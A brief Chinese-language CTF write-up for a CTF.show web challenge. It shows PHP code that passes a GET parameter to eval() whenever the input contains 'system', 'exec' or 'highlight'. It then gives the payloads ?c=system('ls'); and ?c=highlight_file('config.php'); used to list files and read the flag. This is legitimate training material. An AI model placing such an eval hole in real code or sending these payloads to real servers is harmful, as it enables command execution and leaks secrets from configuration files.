技術標籤：CTF_Web_WriteupCTF.show

<?php
# flag in config.php
include("config.php");
if(isset($_GET['c'])){
        $c = $_GET['c'];
        if(preg_match("/system|exec|highlight/i",$c)){
                eval($c);
        }else{
            die("cmd error");
        }
}else
 
{
        highlight_file(__FILE__);
}
?>

題目要求我們利用 system、exec、highlight才能執行eval()。
構造

?c=system('ls');

發現存在兩個檔案

構造
highlight_file() 函式對檔案進行語法高亮顯示。

?c=highlight_file(’config.php‘);

得到flag